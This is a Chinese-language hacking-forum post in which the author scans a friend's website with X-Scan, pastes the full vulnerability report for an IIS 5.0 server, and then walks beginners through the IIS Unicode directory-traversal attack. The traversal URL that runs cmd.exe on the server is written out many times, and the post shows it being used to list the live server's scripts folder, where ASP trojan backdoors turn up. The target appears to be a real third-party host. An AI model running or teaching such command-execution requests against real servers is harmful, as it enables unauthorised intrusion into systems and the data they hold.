今天无聊连家都回不去呵呵~~朋友叫测试个站 打开地址一看呆拉!!可能是他故意难我吧打开地址后就这样: [[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。 请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。 ]]] 呵呵!! 不怕有句老话不会扫描那就不是一个真正的黑客 来该X-Scan上场 ****.**.**.** 扫描结果如下: X-Scan 检测报告 ------------------ 检测结果 - 存活主机 : 1 - 漏洞数量 : 22 - 警告数量 : 16 - 提示数量 : 6 主机列表 ****.**.**.** (发现安全漏洞) . OS: Windows; PORT/TCP: 21, 25, 53, 80, 443 详细资料 ****.**.**.** : . 开放端口列表 : o smtp (25/tcp) (发现安全警告) o domain (53/tcp) (发现安全提示) o www (80/tcp) (发现安全漏洞) o https (443/tcp) (发现安全提示) o ftp (21/tcp) (发现安全提示) . 端口"smtp (25/tcp)"发现安全警告 : SMTP服务器不支持用户身份验证,允许匿名用户使用 . 端口"smtp (25/tcp)"发现安全提示 : A SMTP server is running on this port Here is its banner : 220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at Wed, 20 Oct 2004 06:28:38 0800 NESSUS_ID : 10330 . 端口"domain (53/tcp)"发现安全提示 : Maybe the "domain" service running on this port. NESSUS_ID : 10330 . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c di . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c dir . 端口"www (80/tcp)"发现安全漏洞 : IIS编码/解码漏洞: . 端口"www (80/tcp)"发现安全漏洞 : The remote Microsoft Frontpage server seems vulnerable to a remote buffer overflow. Exploitation of this bug could give an unauthorized user access to the machine. The following systems are known to be vulnerable: Microsoft Windows 2000 Service Pack 2, Service Pack 3 Microsoft Windows XP, Microsoft Windows XP Service Pack 1 Microsoft Office XP, Microsoft Office XP Service Release 1 Solution: Install relevant service pack or hotfix from URL below. See als http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx Risk factor : High CVE_ID : CAN-2003-0822, CAN-2003-0824 NESSUS_ID : 11923 Other references : IAVA:2003-A-0033 . 端口"www (80/tcp)"发现安全漏洞 : There's a buffer overflow in the remote web server through the ISAPI filter. It is possible to overflow the remote web server and execute commands as user SYSTEM. Solution: See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx Risk factor : High CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507, CVE-2001-0508, CVE-2001-0500 BUGTRAQ_ID : 2690, 3190, 3194, 3195 NESSUS_ID : 10685 . 端口"www (80/tcp)"发现安全漏洞 : The IIS server appears to have the .HTR ISAPI filter mapped. At least one remote vulnerability has been discovered for the .HTR filter. This is detailed in Microsoft Advisory MS02-018, and gives remote SYSTEM level access to the web server. It is recommended that, even if you have patched this vulnerability, you unmap the .HTR extension and any other unused ISAPI extensions if they are not required for the operation of your site. Solution : To unmap the .HTR extension: 1.Open Internet Services Manager. 2.Right-click the Web server choose Properties from the context menu. 3.Master Properties 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration and remove the reference to .htr from the list. In addition, you may wish to download and install URLSCAN from the Microsoft Technet Website. URLSCAN, by default, blocks all requests for .htr files. Risk factor : High CVE_ID : CVE-2002-0071 BUGTRAQ_ID : 4474 NESSUS_ID : 10932 Other references : IAVA:2002-A-0002 . 端口"www (80/tcp)"发现安全漏洞 : The remote server is vulnerable to a buffer overflow in the .HTR filter. An attacker may use this flaw to execute arbitrary code on this host (although the exploitation of this flaw is considered as being difficult). Solution: To unmap the .HTR extension: 1.Open Internet Services Manager. 2.Right-click the Web server choose Properties from the context menu. 3.Master Properties 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration and remove the reference to .htr from the list. See MS bulletin MS02-028 for a patch Risk factor : High CVE_ID : CVE-2002-0364, CVE-2002-0071 BUGTRAQ_ID : 4855 NESSUS_ID : 11028 Other references : IAVA:2002-A-0002 . 端口"www (80/tcp)"发现安全漏洞 : The remote WebDAV server may be vulnerable to a buffer overflow when it receives a too long request. An attacker may use this flaw to execute arbitrary code within the LocalSystem security context. *** As safe checks are enabled, Nessus did not actually test for this *** flaw, so this might be a false positive Solution : See http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx Risk Factor : High CVE_ID : CAN-2003-0109 BUGTRAQ_ID : 7116 NESSUS_ID : 11412 Other references : IAVA:2003-A-0005 . 端口"www (80/tcp)"发现安全漏洞 : When IIS receives a user request to run a script, it renders the request in a decoded canonical form, then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server. Solution: See MS advisory MS01-026(Superseded by ms01-044) See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx Risk factor : High CVE_ID : CVE-2001-0507, CVE-2001-0333 BUGTRAQ_ID : 2708 NESSUS_ID : 10671 . 端口"www (80/tcp)"发现安全漏洞 : There's a buffer overflow in the remote web server through the ASP ISAPI filter. It is possible to overflow the remote web server and execute commands as user SYSTEM. Solution: See http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx Risk factor : High CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149 BUGTRAQ_ID : 4485 NESSUS_ID : 10935 Other references : IAVA:2002-A-0002 . 端口"www (80/tcp)"发现安全警告 : . 端口"www (80/tcp)"发现安全提示 : A web server is running on this port NESSUS_ID : 10330 . 端口"www (80/tcp)"发现安全提示 : The remote web server type is : Microsoft-IIS/5.0 Solution : You can use urlscan to change reported server for IIS. NESSUS_ID : 10107 . 端口"https (443/tcp)"发现安全提示 : Maybe the "https" service running on this port. NESSUS_ID : 10330 . 端口"ftp (21/tcp)"发现安全提示 : Maybe the "ftp" service running on this port. NESSUS_ID : 10330》》》》》》》 结果发现IIS解码漏洞 那怎么利用呢高手就不用问拉 莱鸟继续》》》 发现没http://***.**.**.**/scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c dir 这里要申明的是我讲的是找ASP木马后门 不做其它入侵 接下来我们打开它发现什么拉..................哈哈 Directory of d:\inetpub\scripts 2004-10-20 11:18 2004-10-20 11:18 2004-10-20 10:34 1,169 admin_nighter.asp 2004-10-20 10:48 29,451 nighterasp1.5.asp 2000-02-09 22:39 15,760 NSIISLOG.DLL 2004-10-20 10:33 3,224 sniao.asp 2004-10-20 09:30 23,109 start.asp 2004-10-20 11:18 49,627 sx.asp 到这里应该明白是怎么回事情了吧 路径d:\inetpub 文件路径\scripts\ admin_nighter.asp 这就是木马 |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-10-1 12:16 , Processed in 0.232563 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.